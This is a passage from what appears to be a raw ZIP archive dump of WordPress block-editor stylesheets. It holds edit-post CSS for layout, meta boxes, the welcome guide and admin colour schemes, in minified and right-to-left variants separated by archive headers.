(min-resolution:192dpi){body.admin-color-ocean{--wp-admin-border-width-focus:1.5px}}body.admin-color-sunrise{--wp-admin-theme-color:#dd823b;--wp-admin-theme-color--rgb:221,130,59;--wp-admin-theme-color-darker-10:#d97426;--wp-admin-theme-color-darker-10--rgb:216.8782608696,116.1847826087,37.6217391304;--wp-admin-theme-color-darker-20:#c36922;--wp-admin-theme-color-darker-20--rgb:195.147826087,104.5434782609,33.852173913;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-sunrise{--wp-admin-border-width-focus:1.5px}}PK!(~=~=dist/edit-post/style.cssnuȯ:root{ --wp-block-synced-color:#7a00df; --wp-block-synced-color--rgb:122, 0, 223; --wp-bound-block-color:var(--wp-block-synced-color); --wp-editor-canvas-background:#ddd; --wp-admin-theme-color:#007cba; --wp-admin-theme-color--rgb:0, 124, 186; --wp-admin-theme-color-darker-10:#006ba1; --wp-admin-theme-color-darker-10--rgb:0, 107, 160.5; --wp-admin-theme-color-darker-20:#005a87; --wp-admin-theme-color-darker-20--rgb:0, 90, 135; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ :root{ --wp-admin-border-width-focus:1.5px; } } .admin-ui-page{ background-color:#fff; color:#2f2f2f; container:admin-ui-page/inline-size; display:flex; flex-flow:column; height:100%; position:relative; z-index:1; } @media not (prefers-reduced-motion){ .admin-ui-page{ transition:width .2s ease-out; } } .admin-ui-page__header{ background:#fff; border-bottom:1px solid #f0f0f0; padding:16px 48px; position:sticky; top:0; } @container (max-width: 430px){ .admin-ui-page__header{ padding:16px 24px; } } .admin-ui-page__header-subtitle{ color:#757575; font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; font-weight:400; line-height:20px; margin:0; padding-block-end:8px; } .admin-ui-page__content{ display:flex; flex-direction:column; flex-grow:1; overflow:auto; } .admin-ui-page__content.has-padding{ padding:16px 20px; } @container (max-width: 430px){ .admin-ui-page__content.has-padding{ padding:16px 24px; } } .show-icon-labels .admin-ui-page__header-actions .components-button.has-icon{ padding:0 8px; width:auto; } .show-icon-labels .admin-ui-page__header-actions .components-button.has-icon svg{ display:none; } .show-icon-labels .admin-ui-page__header-actions .components-button.has-icon:after{ content:attr(aria-label); font-size:12px; } .edit-post-fullscreen-mode-close__view-mode-toggle{ height:64px; left:0; top:0; width:64px; z-index:100; } .edit-post-fullscreen-mode-close__view-mode-toggle .components-button{ align-items:center; border-radius:0; color:#fff; display:flex; height:100%; justify-content:center; overflow:hidden; padding:0; width:100%; } .edit-post-fullscreen-mode-close__view-mode-toggle .components-button:active,.edit-post-fullscreen-mode-close__view-mode-toggle .components-button:hover{ color:#fff; } .edit-post-fullscreen-mode-close__view-mode-toggle .components-button:focus{ box-shadow:none; } .edit-post-fullscreen-mode-close__view-mode-toggle .edit-post-fullscreen-mode-close__view-mode-toggle-icon img,.edit-post-fullscreen-mode-close__view-mode-toggle .edit-post-fullscreen-mode-close__view-mode-toggle-icon svg{ background:#1e1e1e; display:block; } .edit-post-fullscreen-mode-close-site-icon__icon{ fill:currentColor; height:100%; padding:12px; width:100%; } .edit-post-fullscreen-mode-close-site-icon__image{ aspect-ratio:1/1; background:#333; height:100%; object-fit:cover; width:100%; } .edit-post-fullscreen-mode-close.components-button:focus{ position:relative; } .edit-post-fullscreen-mode-close.components-button:focus:before{ bottom:0; box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color), inset 0 0 0 calc(1px + var(--wp-admin-border-width-focus)) #fff; content:""; display:block; left:0; position:absolute; right:0; top:0; z-index:1; } .edit-post-fullscreen-mode-close__back-icon{ align-items:center; background-color:#ccc; display:flex; height:64px; justify-content:center; left:0; pointer-events:none; position:absolute; top:0; width:64px; } .edit-post-fullscreen-mode-close__back-icon svg{ fill:currentColor; } .edit-post-fullscreen-mode-close__back-icon.has-site-icon{ backdrop-filter:saturate(180%) blur(15px); background-color:#fff9; } .show-icon-labels .editor-header .edit-post-fullscreen-mode-close.has-icon{ width:64px; } .show-icon-labels .editor-header .edit-post-fullscreen-mode-close.has-icon svg{ display:block; } .show-icon-labels .editor-header .edit-post-fullscreen-mode-close.has-icon:after{ content:none; } .edit-post-meta-boxes-main{ background-color:#fff; display:flex; filter:drop-shadow(0 -1px rgba(0, 0, 0, .133)); flex-direction:column; outline:1px solid #0000; overflow:hidden; padding-block-start:32px; } .edit-post-meta-boxes-main__presenter{ box-shadow:0 1px #ddd; display:flex; height:32px; inset:0 0 auto; outline:1px solid #0000; position:relative; z-index:10000; } .edit-post-meta-boxes-main__presenter>button{ appearance:none; background-color:initial; border:none; outline:none; padding:0; } .edit-post-meta-boxes-main__presenter>button[aria-expanded]{ align-items:center; cursor:pointer; display:flex; justify-content:space-between; padding-inline:24px 12px; width:100%; } .edit-post-meta-boxes-main__presenter>button[aria-expanded]:is(:hover,:focus-visible){ color:var(--wp-admin-theme-color); } .edit-post-meta-boxes-main__presenter>button[aria-expanded]:focus-visible:after{ box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); content:""; inset:var(--wp-admin-border-width-focus); outline:2px solid #0000; position:absolute; } .edit-post-meta-boxes-main__presenter>button[aria-expanded]>svg{ fill:currentColor; } .edit-post-meta-boxes-main__presenter button[role=separator]{ cursor:row-resize; inset:0; margin:auto; position:absolute; width:64px; } .edit-post-meta-boxes-main__presenter button[role=separator]:before{ background-color:#ddd; border-radius:2px; content:""; height:4px; inset-block:calc(50% - 2px) auto; outline:2px solid #0000; outline-offset:-2px; position:absolute; transform:translateX(-50%); width:inherit; } @media not (prefers-reduced-motion){ .edit-post-meta-boxes-main__presenter button[role=separator]:before{ transition:width .3s ease-out; } } .edit-post-meta-boxes-main__presenter button[role=separator]:is(:hover,:focus-visible):before{ background-color:var(--wp-admin-theme-color); width:80px; } @media (pointer:coarse){ .edit-post-meta-boxes-main{ padding-block-start:36px; } .edit-post-meta-boxes-main__presenter{ height:36px; } } .edit-post-meta-boxes-main .edit-post-meta-boxes-main__liner{ overflow:auto; } .edit-post-meta-boxes-main__liner{ isolation:isolate; } .is-resizing.edit-post-meta-boxes-main .edit-post-meta-boxes-main__liner{ display:unset; } .edit-post-layout__metaboxes{ clear:both; } .has-metaboxes .interface-interface-skeleton__content:has(.edit-post-meta-boxes-main) .editor-visual-editor{ flex-basis:0%; flex-shrink:1; } .has-metaboxes .editor-visual-editor.is-iframed{ isolation:isolate; } .components-editor-notices__snackbar{ bottom:24px; padding-left:24px; padding-right:24px; position:fixed; right:0; } .edit-post-layout .components-editor-notices__snackbar{ left:0; } @media (min-width:783px){ .edit-post-layout .components-editor-notices__snackbar{ left:160px; } } @media (min-width:783px){ .auto-fold .edit-post-layout .components-editor-notices__snackbar{ left:36px; } } @media (min-width:961px){ .auto-fold .edit-post-layout .components-editor-notices__snackbar{ left:160px; } } .folded .edit-post-layout .components-editor-notices__snackbar{ left:0; } @media (min-width:783px){ .folded .edit-post-layout .components-editor-notices__snackbar{ left:36px; } } body.is-fullscreen-mode .edit-post-layout .components-editor-notices__snackbar{ left:0 !important; } .edit-post-meta-boxes-area{ position:relative; } .edit-post-meta-boxes-area .inside,.edit-post-meta-boxes-area__container{ box-sizing:initial; } .edit-post-meta-boxes-area input,.edit-post-meta-boxes-area textarea{ box-sizing:border-box; } .edit-post-meta-boxes-area .postbox-header{ border-bottom:0; border-top:1px solid #ddd; } .edit-post-meta-boxes-area #poststuff{ margin:0 auto; min-width:auto; padding-top:0; } .edit-post-meta-boxes-area #poststuff .stuffbox>h3,.edit-post-meta-boxes-area #poststuff h2.hndle,.edit-post-meta-boxes-area #poststuff h3.hndle{ box-sizing:border-box; color:inherit; font-weight:600; outline:none; padding:0 24px; position:relative; width:100%; } .edit-post-meta-boxes-area .postbox{ border:0; color:inherit; margin-bottom:0; } .edit-post-meta-boxes-area .postbox>.inside{ color:inherit; margin:0; padding:0 24px 24px; } .edit-post-meta-boxes-area .postbox .handlediv{ height:44px; width:44px; } .edit-post-meta-boxes-area.is-loading:before{ background:#0000; bottom:0; content:""; left:0; position:absolute; right:0; top:0; z-index:1; } .edit-post-meta-boxes-area .components-spinner{ position:absolute; right:20px; top:10px; z-index:5; } .edit-post-meta-boxes-area .is-hidden{ display:none; } .edit-post-meta-boxes-area .metabox-location-side .postbox input[type=checkbox]{ border:1px solid #757575; } .edit-post-meta-boxes-area .metabox-location-side .postbox input[type=checkbox]:checked{ background:#fff; border-color:#757575; } .edit-post-meta-boxes-area .metabox-location-side .postbox input[type=checkbox]:before{ margin:-3px -4px; } .edit-post-meta-boxes-area__clear{ clear:both; } .edit-post-welcome-guide,.edit-template-welcome-guide{ width:312px; } .edit-post-welcome-guide__image,.edit-template-welcome-guide__image{ background:#00a0d2; margin:0 0 16px; } .edit-post-welcome-guide__image>img,.edit-template-welcome-guide__image>img{ display:block; max-width:100%; object-fit:cover; } .edit-post-welcome-guide__heading,.edit-template-welcome-guide__heading{ font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:24px; line-height:1.4; margin:16px 0; padding:0 32px; } .edit-post-welcome-guide__text,.edit-template-welcome-guide__text{ font-size:13px; line-height:1.4; margin:0 0 24px; padding:0 32px; } .edit-post-welcome-guide__inserter-icon,.edit-template-welcome-guide__inserter-icon{ margin:0 4px; vertical-align:text-top; } .edit-template-welcome-guide .components-button svg{ fill:#fff; } body.js.block-editor-page{ background:#fff; } body.js.block-editor-page #wpcontent{ padding-left:0; } body.js.block-editor-page #wpbody-content{ padding-bottom:0; } body.js.block-editor-page #wpbody-content>div:not(.block-editor):not(#screen-meta),body.js.block-editor-page #wpfooter{ display:none; } body.js.block-editor-page .a11y-speak-region{ left:-1px; top:-1px; } body.js.block-editor-page ul#adminmenu a.wp-has-current-submenu:after,body.js.block-editor-page ul#adminmenu>li.current>a.current:after{ border-right-color:#fff; } body.js.block-editor-page .media-frame select.attachment-filters:last-of-type{ max-width:100%; width:auto; } .block-editor-page #wpwrap{ overflow-y:auto; } @media (min-width:782px){ .block-editor-page #wpwrap{ overflow-y:initial; } } .edit-post-visual-editor.is-iframed{ box-sizing:border-box; } .edit-post-visual-editor.is-iframed *,.edit-post-visual-editor.is-iframed :after,.edit-post-visual-editor.is-iframed :before{ box-sizing:inherit; } @media (min-width:600px){ .block-editor__container{ bottom:0; left:0; min-height:calc(100vh - 46px); position:absolute; right:0; top:0; } } @media (min-width:782px){ .block-editor__container{ min-height:calc(100vh - 32px); } body.is-fullscreen-mode .block-editor__container{ min-height:100vh; } } .block-editor__container img{ height:auto; max-width:100%; } body.admin-color-light{ --wp-admin-theme-color:#0085ba; --wp-admin-theme-color--rgb:0, 133, 186; --wp-admin-theme-color-darker-10:#0073a1; --wp-admin-theme-color-darker-10--rgb:0, 114.7661290323, 160.5; --wp-admin-theme-color-darker-20:#006187; --wp-admin-theme-color-darker-20--rgb:0, 96.5322580645, 135; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-light{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-modern{ --wp-admin-theme-color:#3858e9; --wp-admin-theme-color--rgb:56, 88, 233; --wp-admin-theme-color-darker-10:#2145e6; --wp-admin-theme-color-darker-10--rgb:33.0384615385, 68.7307692308, 230.4615384615; --wp-admin-theme-color-darker-20:#183ad6; --wp-admin-theme-color-darker-20--rgb:23.6923076923, 58.1538461538, 214.3076923077; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-modern{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-blue{ --wp-admin-theme-color:#096484; --wp-admin-theme-color--rgb:9, 100, 132; --wp-admin-theme-color-darker-10:#07526c; --wp-admin-theme-color-darker-10--rgb:7.3723404255, 81.914893617, 108.1276595745; --wp-admin-theme-color-darker-20:#064054; --wp-admin-theme-color-darker-20--rgb:5.7446808511, 63.829787234, 84.2553191489; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-blue{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-coffee{ --wp-admin-theme-color:#46403c; --wp-admin-theme-color--rgb:70, 64, 60; --wp-admin-theme-color-darker-10:#383330; --wp-admin-theme-color-darker-10--rgb:56.2692307692, 51.4461538462, 48.2307692308; --wp-admin-theme-color-darker-20:#2b2724; --wp-admin-theme-color-darker-20--rgb:42.5384615385, 38.8923076923, 36.4615384615; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-coffee{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-ectoplasm{ --wp-admin-theme-color:#523f6d; --wp-admin-theme-color--rgb:82, 63, 109; --wp-admin-theme-color-darker-10:#46365d; --wp-admin-theme-color-darker-10--rgb:69.8430232558, 53.6598837209, 92.8401162791; --wp-admin-theme-color-darker-20:#3a2c4d; --wp-admin-theme-color-darker-20--rgb:57.6860465116, 44.3197674419, 76.6802325581; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-ectoplasm{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-midnight{ --wp-admin-theme-color:#e14d43; --wp-admin-theme-color--rgb:225, 77, 67; --wp-admin-theme-color-darker-10:#dd382d; --wp-admin-theme-color-darker-10--rgb:221.4908256881, 56.1788990826, 45.0091743119; --wp-admin-theme-color-darker-20:#d02c21; --wp-admin-theme-color-darker-20--rgb:207.8348623853, 44.2201834862, 33.1651376147; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-midnight{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-ocean{ --wp-admin-theme-color:#627c83; --wp-admin-theme-color--rgb:98, 124, 131; --wp-admin-theme-color-darker-10:#576e74; --wp-admin-theme-color-darker-10--rgb:87.0873362445, 110.192139738, 116.4126637555; --wp-admin-theme-color-darker-20:#4c6066; --wp-admin-theme-color-darker-20--rgb:76.1746724891, 96.384279476, 101.8253275109; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-ocean{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-sunrise{ --wp-admin-theme-color:#dd823b; --wp-admin-theme-color--rgb:221, 130, 59; --wp-admin-theme-color-darker-10:#d97426; --wp-admin-theme-color-darker-10--rgb:216.8782608696, 116.1847826087, 37.6217391304; --wp-admin-theme-color-darker-20:#c36922; --wp-admin-theme-color-darker-20--rgb:195.147826087, 104.5434782609, 33.852173913; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-sunrise{ --wp-admin-border-width-focus:1.5px; } }PK!kƀ++dist/edit-post/classic.min.cssnuȯ.editor-styles-wrapper :where(:not(.is-layout-flex,.is-layout-grid))>.wp-block{margin-left:auto;margin-right:auto}html :where(.editor-styles-wrapper){padding:8px}html :where(.editor-styles-wrapper) .block-editor-block-list__layout.is-root-container>.wp-block[data-align=full]{margin-left:-8px;margin-right:-8px}html :where(.wp-block){margin-bottom:28px;margin-top:28px;max-width:840px}html :where(.wp-block)[data-align=wide]{max-width:1100px}html :where(.wp-block)[data-align=full]{max-width:none}html :where(.wp-block)[data-align=left],html :where(.wp-block)[data-align=right]{height:0;width:100%}html :where(.wp-block)[data-align=left]:before,html :where(.wp-block)[data-align=right]:before{content:none}html :where(.wp-block)[data-align=left]>*{ /*!rtl:begin:ignore*/float:left;margin-right:2em /*!rtl:end:ignore*/}html :where(.wp-block)[data-align=right]>*{ /*!rtl:begin:ignore*/float:right;margin-left:2em /*!rtl:end:ignore*/}html :where(.wp-block)[data-align=full],html :where(.wp-block)[data-align=wide]{clear:both}.wp-block-group>[data-align=full]{margin-left:auto;margin-right:auto}.wp-block-group.has-background>[data-align=full]{margin-left:-30px;width:calc(100% + 60px)}[data-align=full] .wp-block-group>.wp-block{padding-left:14px;padding-right:14px}@media (min-width:600px){[data-align=full] .wp-block-group>.wp-block{padding-left:0;padding-right:0}}[data-align=full] .wp-block-group>[data-align=full]{left:0;max-width:none;padding-left:0;padding-right:0;width:100%}[data-align=full] .wp-block-group.has-background>[data-align=full]{width:calc(100% + 60px)}PK!=n7n7 dist/edit-post/style-rtl.min.cssnuȯ:root{--wp-block-synced-color:#7a00df;--wp-block-synced-color--rgb:122,0,223;--wp-bound-block-color:var(--wp-block-synced-color);--wp-editor-canvas-background:#ddd;--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba1;--wp-admin-theme-color-darker-10--rgb:0,107,160.5;--wp-admin-theme-color-darker-20:#005a87;--wp-admin-theme-color-darker-20--rgb:0,90,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.admin-ui-page{background-color:#fff;color:#2f2f2f;container:admin-ui-page/inline-size;display:flex;flex-flow:column;height:100%;position:relative;z-index:1}@media not (prefers-reduced-motion){.admin-ui-page{transition:width .2s ease-out}}.admin-ui-page__header{background:#fff;border-bottom:1px solid #f0f0f0;padding:16px 48px;position:sticky;top:0}@container (max-width: 430px){.admin-ui-page__header{padding:16px 24px}}.admin-ui-page__header-subtitle{color:#757575;font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;font-weight:400;line-height:20px;margin:0;padding-block-end:8px}.admin-ui-page__content{display:flex;flex-direction:column;flex-grow:1;overflow:auto}.admin-ui-page__content.has-padding{padding:16px 20px}@container (max-width: 430px){.admin-ui-page__content.has-padding{padding:16px 24px}}.show-icon-labels .admin-ui-page__header-actions .components-button.has-icon{padding:0 8px;width:auto}.show-icon-labels .admin-ui-page__header-actions .components-button.has-icon svg{display:none}.show-icon-labels .admin-ui-page__header-actions .components-button.has-icon:after{content:attr(aria-label);font-size:12px}.edit-post-fullscreen-mode-close__view-mode-toggle{height:64px;right:0;top:0;width:64px;z-index:100}.edit-post-fullscreen-mode-close__view-mode-toggle .components-button{align-items:center;border-radius:0;color:#fff;display:flex;height:100%;justify-content:center;overflow:hidden;padding:0;width:100%}.edit-post-fullscreen-mode-close__view-mode-toggle .components-button:active,.edit-post-fullscreen-mode-close__view-mode-toggle .components-button:hover{color:#fff}.edit-post-fullscreen-mode-close__view-mode-toggle .components-button:focus{box-shadow:none}.edit-post-fullscreen-mode-close__view-mode-toggle .edit-post-fullscreen-mode-close__view-mode-toggle-icon img,.edit-post-fullscreen-mode-close__view-mode-toggle .edit-post-fullscreen-mode-close__view-mode-toggle-icon svg{background:#1e1e1e;display:block}.edit-post-fullscreen-mode-close-site-icon__icon{fill:currentColor;height:100%;padding:12px;width:100%}.edit-post-fullscreen-mode-close-site-icon__image{aspect-ratio:1/1;background:#333;height:100%;object-fit:cover;width:100%}.edit-post-fullscreen-mode-close.components-button:focus{position:relative}.edit-post-fullscreen-mode-close.components-button:focus:before{bottom:0;box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color),inset 0 0 0 calc(1px + var(--wp-admin-border-width-focus)) #fff;content:"";display:block;left:0;position:absolute;right:0;top:0;z-index:1}.edit-post-fullscreen-mode-close__back-icon{align-items:center;background-color:#ccc;display:flex;height:64px;justify-content:center;pointer-events:none;position:absolute;right:0;top:0;width:64px}.edit-post-fullscreen-mode-close__back-icon svg{fill:currentColor}.edit-post-fullscreen-mode-close__back-icon.has-site-icon{backdrop-filter:saturate(180%) blur(15px);background-color:#fff9}.show-icon-labels .editor-header .edit-post-fullscreen-mode-close.has-icon{width:64px}.show-icon-labels .editor-header .edit-post-fullscreen-mode-close.has-icon svg{display:block}.show-icon-labels .editor-header .edit-post-fullscreen-mode-close.has-icon:after{content:none}.edit-post-meta-boxes-main{background-color:#fff;display:flex;filter:drop-shadow(0 -1px rgba(0,0,0,.133));flex-direction:column;outline:1px solid #0000;overflow:hidden;padding-block-start:32px}.edit-post-meta-boxes-main__presenter{box-shadow:0 1px #ddd;display:flex;height:32px;inset:0 0 auto;outline:1px solid #0000;position:relative;z-index:10000}.edit-post-meta-boxes-main__presenter>button{appearance:none;background-color:initial;border:none;outline:none;padding:0}.edit-post-meta-boxes-main__presenter>button[aria-expanded]{align-items:center;cursor:pointer;display:flex;justify-content:space-between;padding-inline:24px 12px;width:100%}.edit-post-meta-boxes-main__presenter>button[aria-expanded]:is(:hover,:focus-visible){color:var(--wp-admin-theme-color)}.edit-post-meta-boxes-main__presenter>button[aria-expanded]:focus-visible:after{box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);content:"";inset:var(--wp-admin-border-width-focus);outline:2px solid #0000;position:absolute}.edit-post-meta-boxes-main__presenter>button[aria-expanded]>svg{fill:currentColor}.edit-post-meta-boxes-main__presenter button[role=separator]{cursor:row-resize;inset:0;margin:auto;position:absolute;width:64px}.edit-post-meta-boxes-main__presenter button[role=separator]:before{background-color:#ddd;border-radius:2px;content:"";height:4px;inset-block:calc(50% - 2px) auto;outline:2px solid #0000;outline-offset:-2px;position:absolute;transform:translateX(50%);width:inherit}@media not (prefers-reduced-motion){.edit-post-meta-boxes-main__presenter button[role=separator]:before{transition:width .3s ease-out}}.edit-post-meta-boxes-main__presenter button[role=separator]:is(:hover,:focus-visible):before{background-color:var(--wp-admin-theme-color);width:80px}@media (pointer:coarse){.edit-post-meta-boxes-main{padding-block-start:36px}.edit-post-meta-boxes-main__presenter{height:36px}}.edit-post-meta-boxes-main .edit-post-meta-boxes-main__liner{overflow:auto}.edit-post-meta-boxes-main__liner{isolation:isolate}.is-resizing.edit-post-meta-boxes-main .edit-post-meta-boxes-main__liner{display:unset}.edit-post-layout__metaboxes{clear:both}.has-metaboxes .interface-interface-skeleton__content:has(.edit-post-meta-boxes-main) .editor-visual-editor{flex-basis:0%;flex-shrink:1}.has-metaboxes .editor-visual-editor.is-iframed{isolation:isolate}.components-editor-notices__snackbar{bottom:24px;left:0;padding-left:24px;padding-right:24px;position:fixed}.edit-post-layout .components-editor-notices__snackbar{right:0}@media (min-width:783px){.edit-post-layout .components-editor-notices__snackbar{right:160px}}@media (min-width:783px){.auto-fold .edit-post-layout .components-editor-notices__snackbar{right:36px}}@media (min-width:961px){.auto-fold .edit-post-layout .components-editor-notices__snackbar{right:160px}}.folded .edit-post-layout .components-editor-notices__snackbar{right:0}@media (min-width:783px){.folded .edit-post-layout .components-editor-notices__snackbar{right:36px}}body.is-fullscreen-mode .edit-post-layout .components-editor-notices__snackbar{right:0!important}.edit-post-meta-boxes-area{position:relative}.edit-post-meta-boxes-area .inside,.edit-post-meta-boxes-area__container{box-sizing:initial}.edit-post-meta-boxes-area input,.edit-post-meta-boxes-area textarea{box-sizing:border-box}.edit-post-meta-boxes-area .postbox-header{border-bottom:0;border-top:1px solid #ddd}.edit-post-meta-boxes-area #poststuff{margin:0 auto;min-width:auto;padding-top:0}.edit-post-meta-boxes-area #poststuff .stuffbox>h3,.edit-post-meta-boxes-area #poststuff h2.hndle,.edit-post-meta-boxes-area #poststuff h3.hndle{box-sizing:border-box;color:inherit;font-weight:600;outline:none;padding:0 24px;position:relative;width:100%}.edit-post-meta-boxes-area .postbox{border:0;color:inherit;margin-bottom:0}.edit-post-meta-boxes-area .postbox>.inside{color:inherit;margin:0;padding:0 24px 24px}.edit-post-meta-boxes-area .postbox .handlediv{height:44px;width:44px}.edit-post-meta-boxes-area.is-loading:before{background:#0000;bottom:0;content:"";left:0;position:absolute;right:0;top:0;z-index:1}.edit-post-meta-boxes-area .components-spinner{left:20px;position:absolute;top:10px;z-index:5}.edit-post-meta-boxes-area .is-hidden{display:none}.edit-post-meta-boxes-area .metabox-location-side .postbox input[type=checkbox]{border:1px solid #757575}.edit-post-meta-boxes-area .metabox-location-side .postbox input[type=checkbox]:checked{background:#fff;border-color:#757575}.edit-post-meta-boxes-area .metabox-location-side .postbox input[type=checkbox]:before{margin:-3px -4px}.edit-post-meta-boxes-area__clear{clear:both}.edit-post-welcome-guide,.edit-template-welcome-guide{width:312px}.edit-post-welcome-guide__image,.edit-template-welcome-guide__image{background:#00a0d2;margin:0 0 16px}.edit-post-welcome-guide__image>img,.edit-template-welcome-guide__image>img{display:block;max-width:100%;object-fit:cover}.edit-post-welcome-guide__heading,.edit-template-welcome-guide__heading{font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:24px;line-height:1.4;margin:16px 0;padding:0 32px}.edit-post-welcome-guide__text,.edit-template-welcome-guide__text{font-size:13px;line-height:1.4;margin:0 0 24px;padding:0 32px}.edit-post-welcome-guide__inserter-icon,.edit-template-welcome-guide__inserter-icon{margin:0 4px;vertical-align:text-top}.edit-template-welcome-guide .components-button svg{fill:#fff}body.js.block-editor-page{background:#fff}body.js.block-editor-page #wpcontent{padding-right:0}body.js.block-editor-page #wpbody-content{padding-bottom:0}body.js.block-editor-page #wpbody-content>div:not(.block-editor):not(#screen-meta),body.js.block-editor-page #wpfooter{display:none}body.js.block-editor-page .a11y-speak-region{right:-1px;top:-1px}body.js.block-editor-page ul#adminmenu a.wp-has-current-submenu:after,body.js.block-editor-page ul#adminmenu>li.current>a.current:after{border-left-color:#fff}body.js.block-editor-page .media-frame select.attachment-filters:last-of-type{max-width:100%;width:auto}.block-editor-page #wpwrap{overflow-y:auto}@media (min-width:782px){.block-editor-page #wpwrap{overflow-y:initial}}.edit-post-visual-editor.is-iframed{box-sizing:border-box}.edit-post-visual-editor.is-iframed *,.edit-post-visual-editor.is-iframed :after,.edit-post-visual-editor.is-iframed :before{box-sizing:inherit}@media (min-width:600px){.block-editor__container{bottom:0;left:0;min-height:calc(100vh - 46px);position:absolute;right:0;top:0}}@media (min-width:782px){.block-editor__container{min-height:calc(100vh - 32px)}body.is-fullscreen-mode .block-editor__container{min-height:100vh}}.block-editor__container img{height:auto;max-width:100%}body.admin-color-light{--wp-admin-theme-color:#0085ba;--wp-admin-theme-color--rgb:0,133,186;--wp-admin-theme-color-darker-10:#0073a1;--wp-admin-theme-color-darker-10--rgb:0,114.7661290323,160.5;--wp-admin-theme-color-darker-20:#006187;--wp-admin-theme-color-darker-20--rgb:0,96.5322580645,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-light{--wp-admin-border-width-focus:1.5px}}body.admin-color-modern{--wp-admin-theme-color:#3858e9;--wp-admin-theme-color--rgb:56,88,233;--wp-admin-theme-color-darker-10:#2145e6;--wp-admin-theme-color-darker-10--rgb:33.0384615385,68.7307692308,230.4615384615;--wp-admin-theme-color-darker-20:#183ad6;--wp-admin-theme-color-darker-20--rgb:23.6923076923,58.1538461538,214.3076923077;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-modern{--wp-admin-border-width-focus:1.5px}}body.admin-color-blue{--wp-admin-theme-color:#096484;--wp-admin-theme-color--rgb:9,100,132;--wp-admin-theme-color-darker-10:#07526c;--wp-admin-theme-color-darker-10--rgb:7.3723404255,81.914893617,108.1276595745;--wp-admin-theme-color-darker-20:#064054;--wp-admin-theme-color-darker-20--rgb:5.7446808511,63.829787234,84.2553191489;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-blue{--wp-admin-border-width-focus:1.5px}}body.admin-color-coffee{--wp-admin-theme-color:#46403c;--wp-admin-theme-color--rgb:70,64,60;--wp-admin-theme-color-darker-10:#383330;--wp-admin-theme-color-darker-10--rgb:56.2692307692,51.4461538462,48.2307692308;--wp-admin-theme-color-darker-20:#2b2724;--wp-admin-theme-color-darker-20--rgb:42.5384615385,38.8923076923,36.4615384615;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-coffee{--wp-admin-border-width-focus:1.5px}}body.admin-color-ectoplasm{--wp-admin-theme-color:#523f6d;--wp-admin-theme-color--rgb:82,63,109;--wp-admin-theme-color-darker-10:#46365d;--wp-admin-theme-color-darker-10--rgb:69.8430232558,53.6598837209,92.8401162791;--wp-admin-theme-color-darker-20:#3a2c4d;--wp-admin-theme-color-darker-20--rgb:57.6860465116,44.3197674419,76.6802325581;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-ectoplasm{--wp-admin-border-width-focus:1.5px}}body.admin-color-midnight{--wp-admin-theme-color:#e14d43;--wp-admin-theme-color--rgb:225,77,67;--wp-admin-theme-color-darker-10:#dd382d;--wp-admin-theme-color-darker-10--rgb:221.4908256881,56.1788990826,45.0091743119;--wp-admin-theme-color-darker-20:#d02c21;--wp-admin-theme-color-darker-20--rgb:207.8348623853,44.2201834862,33.1651376147;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-midnight{--wp-admin-border-width-focus:1.5px}}body.admin-color-ocean{--wp-admin-theme-color:#627c83;--wp-admin-theme-color--rgb:98,124,131;--wp-admin-theme-color-darker-10:#576e74;--wp-admin-theme-color-darker-10--rgb:87.0873362445,110.192139738,116.4126637555;--wp-admin-theme-color-darker-20:#4c6066;--wp-admin-theme-color-darker-20--rgb:76.1746724891,96.384279476,101.8253275109;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-ocean{--wp-admin-border-width-focus:1.5px}}body.admin-color-sunrise{--wp-admin-theme-color:#dd823b;--wp-admin-theme-color--rgb:221,130,59;--wp-admin-theme-color-darker-10:#d97426;--wp-admin-theme-color-darker-10--rgb:216.8782608696,116.1847826087,37.6217391304;--wp-admin-theme-color-darker-20:#c36922;--wp-admin-theme-color-darker-20--rgb:195.147826087,104.5434782609,33.852173913;--wp-admin-border-width-focus:2px}@media 